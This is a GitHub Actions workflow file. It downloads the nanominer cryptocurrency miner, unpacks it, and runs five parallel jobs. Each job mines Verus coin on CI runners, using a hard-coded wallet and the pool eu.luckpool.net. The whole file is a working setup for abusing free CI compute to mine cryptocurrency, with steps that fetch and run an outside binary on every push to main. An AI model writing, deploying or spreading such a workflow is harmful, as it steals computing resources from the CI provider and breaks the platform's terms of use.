name: Nanominer 20 Jobs

on:
  push:
    branches:
      - main
  workflow_dispatch:  # Allows manual trigger

jobs:
  nanominer:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job: [1, 2, 3, 4, 5]
    steps:
      - name: Download Nanominer
        run: wget https://github.com/nanopool/nanominer/releases/download/v3.7.7/nanominer-linux-3.7.7.tar.gz

      - name: Extract Nanominer
        run: |
          mkdir -p nanominer-linux-3.7.7
          tar -xvf nanominer-linux-3.7.7.tar.gz -C nanominer-linux-3.7.7 --strip-components=1

      - name: Verify Directory
        run: |
          if [ -d "nanominer-linux-3.7.7" ]; then
            echo "Directory exists."
          else
            echo "Directory does not exist."
            exit 1
          fi

      - name: Run Nanominer (Job ${{ matrix.job }})
        run: |
          cd nanominer-linux-3.7.7
          chmod +x nanominer
          ./nanominer -algo Verushash -coin VRSC -wallet RCvg94F85Uw8f89ZznoEpXktTC2ZNXe8KV.M1 -pool1 eu.luckpool.net:3956 -cpuThreads 6
